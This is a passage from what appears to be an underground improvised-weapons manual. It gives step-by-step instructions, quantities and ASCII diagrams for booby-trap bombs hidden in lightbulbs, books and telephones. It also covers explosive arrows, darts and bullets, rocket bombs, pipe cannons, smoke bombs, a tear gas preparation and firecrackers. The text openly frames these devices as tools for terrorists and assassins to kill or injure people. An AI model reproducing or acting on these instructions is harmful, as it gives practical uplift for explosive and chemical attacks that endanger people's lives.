extremely difficult, unless one has the aid of a high explosive. If a gallon
jug of gasoline was placed directly over a high explosive charge, and the
charge was detonated, the gasoline would instantly be atomized and ignited. If
this occurred in a building, for example, an atomized particle explosion would
surely occur. Only a small amount of high explosive would be necessary to
accomplish this feat, about 1/2 a pound of T.N.T. or 1/4 a pound of R.D.X.
Also, instead of gasoline, powdered aluminum could be used. It is necessary
that a high explosive be used to atomize a flammable material, since a
low-order explosion does not occur quickly enough to atomize or ignite the
flammable material.


4.54     LIGHTBULB BOMBS

     An automatic reaction to walking into a dark room is to turn on the
light. This can be fatal, if a lightbulb bomb has been placed in the overhead
light socket.  A lightbulb bomb is surprisingly easy to make.  It also comes
with its own initiator and electric ignition system.  On some lightbulbs, the
lightbulb glass can be removed from the metal base by heating the base of a
lightbulb in a gas flame, such as that of a blowtorch or gas stove.  This must
be done carefully, since the inside of a lightbulb is a vacuum.  When the glue
gets hot enough, the glass bulb can be pulled off the metal base.  On other
bulbs, it is necessary to heat the glass directly with a blowtorch or
oxy-acetylene torch. In either case, once the bulb and/or base has cooled down
to room temperature or lower, the bulb can be filled with an explosive
material, such as black powder.  If the glass was removed from the metal base,
it must be glued back on to the base with epoxy.  If a hole was put in the
bulb, a piece of duct tape is sufficient to hold the explosive in the in the
bulb.  Then, after making sure that the socket has no power by checking with a
working lightbulb, all that need be done is to screw the lightbulb bomb into
the socket.  Such a device has been used by terrorists or assassins with much
success, since few people would search the room for a bomb without first
turning on the light.


4.55     BOOK BOMBS

     Concealing a bomb can be extremely difficult in a day and age where
perpetrators of violence run wild.  Bags and briefcases are often searched by
authorities whenever one enters a place where an individual might intend to
set off a bomb.  One approach to disguising a bomb is to build what is called
a book bomb; an explosive device that is entirely contained inside of a book.

     Usually, a relatively large book is required, and the book must be of the
hardback variety to hide any protrusions of a bomb.  Dictionaries, law books,
large textbooks, and other such books work well.  When an individual makes a
bookbomb, he/she must choose a type of book that is appropriate for the place
where the book bomb will be placed.  The actual construction of a book bomb
can be done by anyone who possesses an electric drill and a coping saw. First,
all of the pages of the book must be glued together.  By pouring an entire
container of water-soluble glue into a large bucket, and filling the bucket
with boiling water, a glue-water solution can be made that will hold all of
the book's pages together tightly.  After the glue-water solution has cooled
to a bearable temperature, and the solution has been stirred well, the pages
of the book must be immersed in the glue-water solution, and each page must be
thoroughly soaked.

   It is extremely important that the covers of the book do not get stuck to
the pages of the book while the pages are drying. Suspending the book by both
covers and clamping the pages together in a vise works best.  When the pages
dry, after about three days to a week, a hole must be drilled into the now
rigid pages, and they should drill out much like wood. Then, by inserting the
coping saw blade through the pages and sawing out a rectangle from the middle
of the book, the individual will be left with a shell of the book's pages. The
pages, when drilled out, should look like this:

(Ill. 4.55)
               ________________________
               | ____________________ |
               | |                  | |
               | |                  | |
               | |                  | |
               | |                  | |
               | |                  | |
               | |                  | |
               | |                  | |
               | |                  | |
               | |                  | |
               | |                  | |
               | |                  | |
               | |__________________| |
               |______________________|

                 (book covers omitted)

     This rectangle must be securely glued to the back cover of the book.
After building his/her bomb, which usually is of the timer or radio controlled
variety, the bomber places it inside the book.  The bomb itself, and whatever
timer or detonator is used, should be packed in foam to prevent it from
rolling or shifting about.  Finally, after the timer is set, or the radio
control has been turned on, the front cover is glued closed, and the bomb is
taken to its destination.


4.56     PHONE BOMBS

     The phone bomb is an explosive device that has been used in the past to
kill or injure a specific individual.  The basic idea is simple: when the
person answers the phone, the bomb explodes.  If a small but powerful high
explosive device with a squib was placed in the phone receiver, when the
current flowed through the receiver, the squib would explode, detonating the
high explosive in the person's hand.  Nasty.  All that has to be done is
acquire a squib, and tape the receiver switch down.

 Unscrew the mouthpiece cover, and remove the speaker, and connect the squib's
leads where it was. Place a high explosive putty, such as C-1 (see section
3.31) in the receiver, and screw the cover on, making sure that the squib is
surrounded by the C-1. Hang the phone up, and leave the tape in place.

  When the individual to whom the phone belongs attempts to answer the phone,
he will notice the tape, and remove it.  This will allow current to flow
through the squib.  Note that the device will not explode by merely making a
phone call; the owner of the phone must lift up the receiver, and remove the
tape.  It is highly probable that the phone will be by his/her ear when the
device explodes...

4.56.1       IMPROVED PHONE BOMB         (from Dave R.)

    The above seems overly complicated to me... it would be better to rig the
device as follows:

  _________            FIRST UNPLUG THE PHONE FROM THE WALL
 /|-------|\  Wire the detonator IN LINE with the wires going to the earpiece,
 ~  |  |   ~  (may need to wire it with a relay so the detonator can receive
  @@@@@@@@    the full line power, not just the audio power to the earpiece)
 @@@@@@@@@@
 @@@@@@@@@@   Pack C4 into the phone body (NOT the handset) and plug it back
             in. When they pick up the phone, power will flow through the
             circuit to the detonator....


5.0     SPECIAL AMMUNITION FOR PROJECTILE WEAPONS

     Explosive and/or poisoned ammunition is an important part of a social
deviant's arsenal.  Such ammunition gives the user a distinct advantage over
individual who use normal ammunition, since a grazing hit is good enough to
kill.  Special ammunition can be made for many types of weapons, from
crossbows to shotguns.


5.1     SPECIAL AMMUNITION FOR PRIMITIVE WEAPONS

     For the purposes of this publication, we will call any weapon primitive
that does not employ burning gunpowder to propel a projectile forward.  This
means blowguns, bows and crossbows, and wristrockets.


5.11     BOW AND CROSSBOW AMMUNITION

     Bows and crossbows both fire arrows or bolts as ammunition.  It is
extremely simple to poison an arrow or bolt, but it is a more difficult matter
to produce explosive arrows or bolts.  If, however, one can acquire aluminum
piping that is the same diameter of an arrow or crossbow bolt, the entire
segment of piping can be converted into an explosive device that detonates
upon impact, or with a fuse.

    All that need be done is find an aluminum tube of the right length and
diameter, and plug the back end with tissue paper and epoxy. Fill the tube
with any type of low-order explosive or sensitive high-order explosive up to
about 1/2 an inch from the top.

   Cut a slot in the piece of tubing, and carefully squeeze the top of the
tube into a round point, making sure to leave a small hole.  Place a no. 11
percussion cap over the hole, and secure it with super glue or epoxy.

     Finally, wrap the end of the device with electrical or duct tape, and
make fins out of tape.  Or, fins can be bought at a sporting goods store, and
glued to the shaft.  The finished product should look like:

(Ill. 5.11)
    ____________
___|____________\____________________
\                                   ---.
/__ ________________________________---`
   |____________/


     When the arrow or bolt strikes a hard surface, the percussion cap explodes,
igniting or detonating the explosive.


5.12     SPECIAL AMMUNITION FOR BLOWGUNS

     The blowgun is an interesting weapon which has several advantages. A
blowgun can be extremely accurate, concealable, and deliver an explosive or
poisoned projectile.  The manufacture of an explosive dart or projectile is
not difficult. To acquire a blowgun, please contact the editor at one of the
addresses given in the introduction.

  Perhaps the most simple design for such involves the use of a pill capsule,
such as the kind that are taken for headaches or allergies. Empty gelatin pill
capsules can be purchased from most health-food stores.  Next, the capsule
would be filled with an impact-sensitive explosive, such as mercury fulminate.
An additional high explosive charge could be placed behind the impact
sensitive explosive, if one of the larger capsules were used.

   Finally, the explosive capsule would be reglued back together, and a tassel
or cotton would be glued to the end containing the high explosive, to insure
that the impact-detonating explosive struck the target first.

 Such a device would probably be about 3/4 of an inch long, not including the
tassel or cotton, and look something like this:

(Ill. 5.12)
                 ____________________
                /mercury |           \-----------------------              
               (fulminate|   R.D.X.   )---------------------- } tassels
                \________|___________/-----------------------


    Care must be taken- if a powerful dart went off in the blowgun, you could
easily blow the back of your head off.


5.13     SPECIAL AMMUNITION FOR WRISTROCKETS AND SLINGSHOTS

     A modern wristrocket is a formidable weapon.  It can throw a shooter marble
about 500 ft. with reasonable accuracy.  Inside of 200 ft., it could well be
lethal to a man or animal, if it struck in a vital area.  Because of the
relatively large sized projectile that can be used in a wristrocket, the
wristrocket can be adapted to throw relatively powerful explosive projectiles.

   A small segment of aluminum pipe could be made into an impact-detonating
device by filling it with an impact-sensitive explosive material.

   Also, such a pipe could be filled with a low-order explosive, and fitted
with a fuse, which would be lit before the device was shot.  One would have to
make sure that the fuse was of sufficient length to insure that the device did
not explode before it reached its intended target.

   Finally, .22 caliber caps, such as the kind that are used in .22 caliber
blank guns, make excellent exploding ammunition for wristrockets, but they
must be used at a relatively close range, because of their light weight.


5.2     SPECIAL AMMUNITION FOR FIREARMS

     When special ammunition is used in combination with the power and
rapidity of modern firearms, it becomes very easy to take on a small army with
a single weapon. It is possible to buy explosive ammunition, but that can be
difficult to do. Such ammunition can also be manufactured in the home.  There
is, however, a risk involved with modifying any ammunition.  If the ammunition
is modified incorrectly, in such a way that it makes the bullet even the
slightest bit wider, an explosion in the barrel of the weapon will occur.  For
this reason, NOBODY SHOULD EVER ATTEMPT TO MANUFACTURE SUCH AMMUNITION.


5.21     SPECIAL AMMUNITION FOR HANDGUNS

     If an individual wished to produce explosive ammunition for his/her
handgun, he/she could do it, provided that the person had an impact-sensitive
explosive and a few simple tools.  One would first purchase all lead bullets,
and then make or acquire an impact-detonating explosive.  By drilling a hole
in a lead bullet with a drill, a space could be created for the placement of
an explosive.  After filling the hole with an explosive, it would be sealed in
the bullet with a drop of hot wax from a candle.  A diagram of a completed
exploding bullet is shown below.

(Ill. 5.21)
                      _o_ ------------ drop of wax
                     /|*|\
                    | |*|-|----------- impact-sensitive explosive                
                    | |_| |
                    |_____|

     This hollow space design also works for putting poison in bullets.

      In many spy thrillers, an assassin is depicted as manufacturing
"exploding bullets" by placing a drop of mercury in the nose of a bullet.
Through experimentation it has been found that this will not work. Mercury
reacts with lead to form a inert silvery compound.


5.22     SPECIAL AMMUNITION FOR SHOTGUNS

     Because of their large bore and high power, it is possible to create some
extremely powerful special ammunition for use in shotguns. If a shotgun shell
is opened at the top, and the shot removed, the shell can be re-closed. Then,
if one can find a very smooth, lightweight wooden dowel that is close to the
bore width of the shotgun, a person can make several types of shotgun-launched
weapons.

   Insert the dowel in the barrel of the shotgun with the shell without the
shot in the firing chamber. Mark the dowel about six inches away from the end
of the barrel, and remove it from the barrel.

   Next, decide what type of explosive or incendiary device is to be used.
This device can be a chemical fire bottle (sect. 3.43), a pipe bomb (sect
4.42), or a thermite bomb (sect 3.41 and 4.42). After the device is made, it
must be securely attached to the dowel. When this is done, place the dowel
back in the shotgun. The bomb or incendiary device should be on the end of the
dowel.

   Make sure that the device has a long enough fuse, light the fuse, and fire
the shotgun. If the projectile is not too heavy, ranges of up to 300 ft are
possible. A diagram of a shotgun projectile is shown below:

(Ill. 5.22)    ____
               ||  |
               ||  |
               ||  | ----- bomb, securely taped to dowel
               ||  |
               ||__|
               || |
               || | ------- fuse
               || |
               ||
               ||
               ||
               || --------- dowel
               ||
               ||
               ||
               || --------- insert this end into shotgun
               ||
               ||

      Special "grenade-launcher blanks" should be used- use of regular blank
ammunition may cause the device to land perilously close to the user.


5.3     SPECIAL AMMUNITION FOR COMPRESSED AIR/GAS WEAPONS

     This section deals with the manufacture of special ammunition for
compressed air or compressed gas weapons, such as pump B.B guns, CO2 B.B guns,
and .22 cal pellet guns.  These weapons, although usually thought of as kids
toys, can be made into rather dangerous weapons.


5.31     SPECIAL AMMUNITION FOR B.B GUNS

     A B.B gun, for this manuscript, will be considered any type of rifle or
pistol that uses compressed air or CO2 gas to fire a projectile with a caliber
of .177, either B.B, or lead pellet. Such guns can have almost as high a
muzzle velocity as a bullet-firing rifle. Because of the speed at which a .177
caliber projectile flies, an impact detonating projectile can easily be made
that has a caliber of .177.

     Most ammunition for guns of greater than .22 caliber use primers to
ignite the powder in the bullet. These primers can be bought at gun stores,
since many people like to reload their own bullets. Such primers detonate when
struck by the firing pin of a gun. They will also detonate if they are thrown
at a hard surface at a great speed.

 Usually, they will also fit in the barrel of a .177 caliber gun. If they are
inserted flat end first, they will detonate when the gun is fired at a hard
surface. If such a primer is attached to a piece of thin metal tubing, such as
that used in an antenna, the tube can be filled with an explosive, be sealed,
and fired from a B.B gun. A diagram of such a projectile appears below:

(Ill. 5.31)
             _____ primers _______
            |                    |
            |                    |
            |                    |
            V                    V
          ______                ______
          | ________________________ |-------------------
          | ****** explosive ******* |------------------- } tassel or          
          | ________________________ |-------------------   cotton
          |_____                _____|-------------------
                    ^
                    |
                    |
                    |_______ antenna tubing

     The front primer is attached to the tubing with a drop of super glue. The
tubing is then filled with an explosive, and the rear primer is glued on.
Finally, a tassel, or a small piece of cotton is glued to the rear primer, to
insure that the projectile strikes on the front primer.  The entire projectile
should be about 3/4 of an inch long.



5.32     SPECIAL AMMUNITION FOR .22 CALIBER PELLET GUNS

     A .22 caliber pellet gun usually is equivalent to a .22 cal rifle, at
close ranges.  Because of this, relatively large explosive projectiles can be
adapted for use with .22 caliber air rifles.  A design similar to that used in
section 5.12 is suitable, since some capsules are about .22 caliber or
smaller. Or, a design similar to that in section 5.31 could be used, only one
would have to purchase black powder percussion caps, instead of ammunition
primers, since there are percussion caps that are about .22 caliber.  A #11
cap is too small, but anything larger will do nicely.


6.0     ROCKETS AND CANNONS

     Rockets and cannon are generally thought of as heavy artillery.
Perpetrators of violence do not usually employ such devices, because they are
difficult or impossible to acquire.  They are not, however, impossible to
make. Any individual who can make or buy black powder or pyrodex can make such
things. A terrorist with a cannon or large rocket is, indeed, something to
fear.


6.1     ROCKETS

     Rockets were first developed by the Chinese several hundred years before
the myth of christ began.  They were used for entertainment, in the form of
fireworks. They were not usually used for military purposes because they were
inaccurate, expensive, and unpredictable.  In modern times, however, rockets
are used constantly by the military, since they are cheap, reliable, and have
no recoil. Perpetrators of violence, fortunately, cannot obtain military
rockets, but they can make or buy rocket engines.  Model rocketry is a popular
hobby of the space age, and to launch a rocket, an engine is required.  Estes,
a subsidiary of Damon, is the leading manufacturer of model rockets and rocket
engines.  Their most powerful engine, the "D" engine, can develop almost 12
lbs. of thrust; enough to send a relatively large explosive charge a
significant distance. Other companies, such as Centuri, produce even larger
rocket engines, which develop up to 30 lbs. of thrust.  These model rocket
engines are quite reliable, and are designed to be fired electrically.  Most
model rocket engines have three basic sections.  The diagram below will help
explain them.

(Ill. 6.1)
     _________________________________________________________
    |_________________________________________________________| -- cardboard
     \ clay   | - - - - - - - - - - | * * * | . . . .|c|            casing
      \_______|  - - - - - - - - -  | * * * |  . . . |l|
        _______ - - - thrust - - -  | smoke | eject  |a|
      / clay  |  - - - - - - - - -  | * * * | . . . .|y|
     /________|_____________________|_______|________|_|_______
    |_________________________________________________________| -- cardboard
                                     casing


     The clay nozzle is where the igniter is inserted.  When the area labeled
"thrust" is ignited, the "thrust" material, usually a large single grain of a
propellant such as black powder or pyrodex, burns, forcing large volumes of
hot, rapidly expanding gasses out the narrow nozzle, pushing the rocket
forward.

     After the material has been consumed, the smoke section of the engine is
ignited.  It is usually a slow-burning material, similar to black powder that
has had various compounds added to it to produce visible smoke, usually black,
white, or yellow in color.  This section exists so that the rocket will be
seen when it reaches its maximum altitude, or apogee.

     When it is burned up, it ignites the ejection charge, labeled "eject".
The ejection charge is finely powdered black powder.  It burns very rapidly,
exploding, in effect.  The explosion of the ejection charge pushes out the
parachute of the model rocket. It could also be used to ignite the fuse of a
bomb...

     Rocket engines have their own peculiar labeling system.  Typical engine
labels are: 1/4A-2T, 1/2A-3T, A8-3, B6-4, C6-7, and D12-5.  The letter is an
indicator of the power of an engine.  "B" engines are twice as powerful as "A"
engines, and "C" engines are twice as powerful as "B" engines, and so on.  The
number following the letter is the approximate thrust of the engine, in
pounds. the final number and letter is the time delay, from the time that the
thrust period of engine burn ends until the ejection charge fires; "3T"
indicates a 3 second delay.

NOTE: an extremely effective rocket propellant can be made by mixing aluminum
      dust with ammonium perchlorate and a very small amount of iron oxide.
      The mixture is bound together by an epoxy.


6.11     BASIC ROCKET BOMB

     A rocket bomb is simply what the name implies: a bomb that is delivered
to its target by means of a rocket.  Most people who would make such a device
would use a model rocket engine to power the device.  By cutting fins from
balsa wood and gluing them to a large rocket engine, such as the Estes "C"
engine, a basic rocket could be constructed.  Then, by attaching a "crater
maker", or CO2 cartridge bomb to the rocket, a bomb would be added.  To insure
that the fuse of the "crater maker" (see sect. 4.42) ignited, the clay over
the ejection charge of the engine should be scraped off with a plastic tool.
The fuse of the bomb should be touching the ejection charge, as shown below.

(Ill. 6.11 #1)

          ____________ rocket engine
          |                         _________ crater maker
          |                         |
          |                         |
          V                         |
     _______________________________V_
     |_______________________________|  ______________________
      \   | - - - - - -|***|::::|      /# # # # # # # # # # # \
       \__| - - - - - -|***|::::|  ___/  # # # # # # # # # # # \
        __  - - - - - -|***|::::|---fuse--- # #  explosive  # # )
       /  | - - - - - -|***|::::|  ___   # # # # # # # # # # # /
      /___|____________|___|____|____ \_______________________/
      |_______________________________|

     thrust> - - - - - -
     smoke>  ***
     ejection charge> ::::


     Duct tape is the best way to attach the crater maker to the rocket
engine. Note in the diagram the absence of the clay over the ejection charge
Many different types of explosive payloads can be attached to the rocket, such
as a high explosive, an incendiary device, or a chemical fire bottle.

   Either four or three fins must be glued to the rocket engine to insure that
the rocket flies straight. The fins should look like the following diagram:

(Ill. 6.11 #2)

          |\
          | \
          |  \
          |   \  <--------- glue this to rocket engine
          |    \
          |     \
          |      \
          |       |
          |       |
          |       |
  leading edge    |
   ------->       |
          |       |
          |       |  trailing edge
          |       |    <--------
          |       |
          |       |
          |       |
          |       |
           \_____/


     The leading edge and trailing edge should be sanded with sandpaper so
that they are rounded.  This will help make the rocket fly straight.  A two
inch long section of a plastic straw can be attached to the rocket to launch
it from.  A clothes hanger can be cut and made into a launch rod.  The segment
of a plastic straw should be glued to the rocket engine adjacent to one of the
fins of the rocket.  A front view of a completed rocket bomb is shown below.

(Ill. 6.11 #3)
                              |
           fin                | <------ fin
            |                 |           |
            |                 |           |
            |               __|__         |
            V              /     \        V
           ---------------|       |---------------
                           \_____/
                              |o <----------- segment of plastic straw           
                   |
                              |
                              | <------ fin
                              |
                              |

     By cutting a coat hanger at the indicated arrows, and bending it, a
launch rod can be made.  After a fuse is inserted in the engine, the rocket is
simply slid down the launch rod, which is put through the segment of plastic
straw. The rocket should slide easily along a coathanger, such as the one
illustated on the following page:

(Ill. 6.11 #4)
                        ____
                       /    \
                      |      |
          cut here _____     |
                       |     |
                       |     |
                       |    / \
                       V   /   \
         _________________/     \________________
        /                                        \
       /                                          \
      /____________________________________________\
                                   ^
                                   |
                                   |
                    and here ______|


     Bend wire to this shape:

(Ill. 6.11 #5)
                         _______ insert into straw
                         |
                         |
                         |
                         V
          ____________________________________________
          \
           \
            \
             \
              \  <--------- bend here to adjust flight angle
               |
               |
               |
               |
               |
               | <---------- put this end in ground
               |


6.12     LONG RANGE ROCKET BOMB

     Long range rockets can be made by using multi-stage rockets.  Model
rocket engines with an "0" for a time delay are designed for use in
multi-stage rockets.  An engine such as the D12-0 is an excellent example of
such an engine. Immediately after the thrust period is over, the ejection
charge explodes.  If another engine is placed directly against the back of an
"0" engine, the explosion of the ejection charge will send hot gasses and
burning particles into the nozzle of the engine above it, and ignite the
thrust section.  This will push the used "0" engine off of the rocket, causing
an overall loss of weight.

 The main advantage of a multi-stage rocket is that it loses weight as
travels, and it gains velocity.  A multi-stage rocket must be designed
somewhat differently than a single stage rocket, since, in order for a rocket
to fly straight, its center of gravity must be ahead of its center of drag.
This is accomplished by adding weight to the front of the rocket, or by moving
the center of drag back by putting fins on the rocket that are well behind the
rocket.  A diagram of a multi-stage rocket appears on the following page:

(Ill. 6.12)
                    ___
                   /   \
                   |   |
                   | C |
                   | M | ------ CM: Crater Maker
                   |   |
                   |   |
                   |___|
                   |   |
                   |   |
                   |   |
                   | C | ------ C6-5 rocket engine
                  /| 6 |\
                 / | | | \
                /  | 5 |  \
               /   |___|   \ ---- fin
              /   /|   |\   \
             /   / |   | \   \
            /   /  |   |  \   \
           /   /   | C |   \   \
          |   /    | 6 |    \   |
          |  /     | | |     \  |
          | /      | 0 |      \ |
          |/       |___|       \|
          |       /     \       |
          \______/   ^   \______/ ------- fin
                     |
                     |
                     |
                     |
                     C6-0 rocket engine

     The fuse is put in the bottom engine.

     Two, three, or even four stages can be added to a rocket bomb to give it
a longer range.  It is important, however, that for each additional stage, the
fin area gets larger.



6.2     CANNON

     The cannon is a piece of artillery that has been in use since the 11th
century.  It is not unlike a musket, in that it is filled with powder, loaded,
and fired.  Cannons of this sort must also be cleaned after each shot,
otherwise, the projectile may jam in the barrel when it is fired, causing the
barrel to explode.  A sociopath could build a cannon without too much trouble,
if he/she had a small sum of money, and some patience.


6.21     BASIC PIPE CANNON

     A simple cannon can be made from a thick pipe by almost anyone.  The only
difficult part is finding a pipe that is extremely smooth on its interior.
This is absolutely necessary; otherwise, the projectile may jam.  Copper or
aluminum piping is usually smooth enough, but it must also be extremely thick
to withstand the pressure developed by the expanding hot gasses in a cannon.

  If one uses a projectile such as a CO2 cartridge, since such a projectile
can be made to explode, a pipe that is about 1.5 - 2 feet long is ideal.  Such
a pipe MUST have walls that are at least 1/3 to 1/2 an inch thick, and be very
smooth on the interior.  If possible, screw an endplug into the pipe.
Otherwise, the pipe must be crimped and folded closed, without cracking or
tearing the pipe. A small hole is drilled in the back of the pipe near the
crimp or endplug. Then, all that need be done is fill the pipe with about two
teaspoons of grade blackpowder or pyrodex, insert a fuse, pack it lightly by
ramming a wad of tissue paper down the barrel, and drop in a CO2 cartridge.
Brace the cannon securely against a strong structure, light the fuse, and run.
If the person is lucky, he will not have overcharged the cannon, and he will
not be hit by pieces of exploding barrel.  Such a cannon would look like this:

(Ill. 6.21 #1)
             __________________ fuse hole
             |
             |
             V
      ________________________________________________________________
      | |_____________________________________________________________|
      |endplug|powder|t.p.| CO2 cartridge
      | ______|______|____|____________________________________________
      |_|______________________________________________________________|

     An exploding projectile can be made for this type of cannon with a CO2
cartridge. It is relatively simple to do. Just make a crater maker, and
construct it such that the fuse projects about an inch from the end of the
cartridge. Then, wrap the fuse with duct tape, covering it entirely, except
for a small amount at the end. Put this in the pipe cannon without using a
tissue paper packing wad.

(Ill. 6.21 #2)
                                         ___
 When the cannon is fired, it           (   )
will ignite the end of the              |C  |
fuse, and shoot the CO2                 |  M|
cartridge. The                          |   |
explosive-filled cartridge              |   |
will explode in about three             \  /
seconds, if all goes well.               [] <--- taped fuse
Such a projectile would look             []
like this:                               []
                                         !  <--- Bare fuse (add matchheads)
6.22     ROCKET FIRING CANNON

(Ill. 6.22)
           ___          A rocket firing cannon can be made exactly like a
          /   \    normal cannon; the only difference is the ammunition. A
          |   |    rocket fired from a cannon will fly further than a rocket
          | C |    alone, since the action of shooting it overcomes the
          | M |    initial inertia. A rocket that is launched when it is
          |   |    moving will go further than one that is launched when it
          |   |    is stationary. Such a rocket would resemble a normal
          |___|    rocket bomb, except it would have no fins. It would look
          | E |    like the image to the left.
          | N |
          | G |         the fuse on such a device would, obviously, be short,
          | I |    but it would not be ignited until the rocket's ejection
          | N |    charge exploded.  Thus, the delay before the ejection
          | E |    charge, in effect, becomes the delay before the bomb
          |___|    explodes. Note that no fuse need be put in the rocket; the
                   burning powder in the cannon will ignite it, and
                   simultaneously push the rocket out of the cannon at a high
                   velocity.


6.23    REINFORCED PIPE CANNON     (added by Loren)

In high school, a friend and I built cannons and launched CO2 cartridges, etc,
etc.  However, the design of the cannon is what I want to add here.

It was made from plain steel water pipe, steel wire, and lead.

Here is a cross section:

(Ill. 6.23)
      _______
      |     |
      | xxxxx_____________________________________________    2" ID pipe
      | |_________________________________________________
      | | ....................  <- steel wire           }
      | |    _____                                      }     3/4" ID pipe
this  | |    | xxx______________________________________}_________________
wire  | |    | |__________________________________________________________
holds | |....| |
it up |>|....| |
in the| |    | |__________________________________________________________
cooker| |    | xxx________________________________________________________
      | |    |____                                      }
      | | .....................                         } <- cast lead
      | |_______________________________________________}_
      | |    _____________________________________________
      | xxxxx
      |_____|


    We dug into the side of a sand pile and built a chimney out of firebrick.
Then we stood the assembled pipe and wire on end in the chimney, sitting on
some bricks.  We then had a blowtorch heating up the chimney, so that the pipe
was red hot.  Then we poured molten lead into the space between the pipes.  If
the caps aren't screwed on real tight, some of the lead will leak out.  If
that happens, turn off the blowtorch and the pipe will cool enough and the
lead will stiffen and stop the leak.

    We used homemeade and commercial black powder, and slow smokeless shotgun
powder in this thing.  After hundreds of shots we cut it up and there was no
evidence of cracks or swelling of the inner pipe.

                                                         Loren


7.0     PYROTECHNICA ERRATA

     There are many other types of pyrotechnics that a perpetrator of violence
might employ. Smoke bombs can be purchased in magic stores, and large military
smoke bombs can be bought through ads in gun and military magazines. Also,
fireworks can also be used as weapons of terror. A large aerial display rocket
would cause many injuries if it were to be fired so that it landed on the
ground near a crowd of people. Even the "harmless" pull-string fireworks,
which consists of a sort of firecracker that explodes when the strings running
through it are pulled, could be placed inside a large charge of a sensitive
high explosive. Tear gas is another material that might well be useful to the
sociopath, and such a material could be instantly disseminated over a large
crowd by means of a rocket-bomb, with nasty effects.


7.1     SMOKE BOMBS

     One type of pyrotechnic device that might be employed by a terrorist in
many way would be a smoke bomb.  Such a device could conceal the getaway
route, or cause a diversion, or simply provide cover.  Such a device, were it
to produce enough smoke that smelled bad enough, could force the evacuation of
a building, for example.  Smoke bombs are not difficult to make.  Although the
military smoke bombs employ powdered white phosphorus or titanium compounds,
such materials are usually unavailable to even the most well-equipped
terrorist. Instead, he/she would have to make the smoke bomb for themselves.

     Most homemade smoke bombs usually employ some type of base powder, such
as black powder or pyrodex, to support combustion.  The base material will
burn well, and provide heat to cause the other materials in the device to
burn, but not completely or cleanly.  Table sugar, mixed with sulfur and a
base material, produces large amounts of smoke.  Sawdust, especially if it has
a small amount of oil in it, and a base powder works well also.  Other
excellent smoke ingredients are small pieces of rubber, finely ground
plastics, and many chemical mixtures.  The material in road flares can be
mixed with sugar and sulfur and a base powder produces much smoke.  Most of
the fuel-oxodizer mixtures, if the ratio is not correct, produce much smoke
when added to a base powder.  The list of possibilities goes on and on.  The
trick to a successful smoke bomb also lies in the container used.  A plastic
cylinder works well, and contributes to the smoke produced.  The hole in the
smoke bomb where the fuse enters must be large enough to allow the material to
burn without causing an explosion.  This is another plus for plastic
containers, since they will melt and burn when the smoke material ignites,
producing an opening large enough to prevent an explosion.

7.11     SIMPLE SMOKE                           (By Zaphod)

  The following reaction should produce a fair amount of smoke.  Since this
 reaction is not all that dangerous you can use larger amounts if necessary

 6 pt. ZINC POWDER
 1 pt. SULFUR POWDER
                       Insert a red hot wire into the pile, step back.


7.2     COLORED FLAMES

     Colored flames can often be used as a signaling device for terrorists. by
putting a ball of colored flame material in a rocket; the rocket, when the
ejection charge fires, will send out a burning colored ball.  The materials that
produce the different colors of flames appear below.

COLOR               MATERIAL                        USED IN

red                 strontium                      road flares,                  
                    salts                          red sparklers
                   (strontium
                     nitrate)

green               barium salts                   green sparklers               
                   (barium nitrate)

yellow              sodium salts                   gold sparklers                
                  (sodium nitrate)

blue                powdered copper                blue sparklers,               
                    old pennies

white               powdered magnesium             firestarters,                 
                    or aluminum                    aluminum foil

purple              potassium permanganate         purple fountains,             
                                                   treating sewage

7.3     TEAR GAS

     A terrorist who could make tear gas or some similar compound could use it
with ease against a large number of people.  Tear gas is fairly complicated to
make, however, and this prevents such individuals from being able to utilize
its great potential for harm.  One method for its preparation is shown below.

     EQUIPMENT FOR MAKING TEAR GAS
     _________

     1.  ring stands (2)             7.  clamp holder
     2.  alcohol burner              8.  condenser
     3.  erlenmeyer flask, 300 ml    9.  rubber tubing
     4.  clamps (2)                  10.  collecting flask
     5.  rubber stopper              11.  air trap
     6.  glass tubing                12.  beaker, 300 ml

     MATERIALS
     _________

     10 gms  glycerine   2 gms sodium bisulfate    distilled water

1.)  In an open area, wearing a gas mask, mix 10 gms of glycerine with 2 gms
of sodium bisulfate in the 300 ml erlenmeyer flask.

2.)  Light the alcohol burner, and gently heat the flask.

3.)  The mixture will begin to bubble and froth; these bubbles are tear gas.

4.)  When the mixture being heated ceases to froth and generate gas, or a
     brown residue becomes visible in the tube, the reaction is complete.
     Remove the heat source, and dispose of the heated mixture, as it is
     corrosive.

5.)  The material that condenses in the condenser and drips into the
     collecting flask is tear gas.  It must be capped tightly, and stored in a
     safe place.


7.4     FIREWORKS

     While fireworks cannot really be used as an effective means of terror,
they do have some value as distractions or incendiaries.  There are several
basic types of fireworks that can be made in the home, whether for fun,
profit, or nasty uses.


7.41     FIRECRACKERS

     A simple firecracker can be made from cardboard tubing and epoxy. The
instructions are below:

1) Cut a small piece of cardboard tubing from the tube you are using.
   "Small" means anything less than 4 times the diameter of the tube.

2) Set the section of tubing down on a piece of wax paper, and fill it with
   epoxy and the drying agent to a height of 3/4 the diameter  of the tubing.
   Allow the epoxy to dry to maximum hardness, as specified on the package.

3) When it is dry, put a small hole in the middle of the tube, and insert a
   desired length of fuse.

4) Fill the tube with any type of flame-sensitive explosive.  Flash powder,
   pyrodex, black powder, potassium picrate, lead azide, nitrocellulose, or
   any of the fast burning fuel-oxodizer mixtures will do nicely.  Fill the
   tube almost to the top.

5) Pack the explosive tightly in the tube with a wad of tissue paper and a
   pencil or other suitable ramrod.  Be sure to leave enough space for more
   epoxy.

6)  Fill the remainder of the tube with the epoxy and hardener, and allow it
    to dry.

7) For those who wish to make spectacular firecrackers, always use flash
   powder, mixed with a small amount of other material for colors. By crushing
   the material on a sparkler, and adding it to the flash powder, the
   explosion will be the same color as the sparkler.   By adding small chunks
   of sparkler material, the device will throw out colored burning sparks, of
   the same color as the sparkler.  By adding powdered iron, orange sparks
   will be produced. White sparks can be produced from magnesium shavings, or
   from small, LIGHTLY crumpled balls of aluminum foil.

        Example:  Suppose I wish to make a firecracker that will explode         
      with a red flash, and throw out white sparks.

        First, I would take a road flare, and finely powder the material
   inside it.   Or, I could take a red sparkler, and finely powder it.

    Then, I would mix a small amount of this material with the flash powder.
   (NOTE: FLASH POWDER MAY REACT WITH SOME MATERIALS THAT IT IS MIXED WITH,
   AND EXPLODE SPONTANEOUSLY!)  I would mix it in a ratio of 9 parts flash
   powder to 1 part of flare or sparkler material, and add about 15 small
   balls of aluminum foil I would store the material in a plastic bag
   overnight outside of the house, to make sure that the stuff doesn't react.
   Then, in the morning, I would test a small amount of it, and if it was
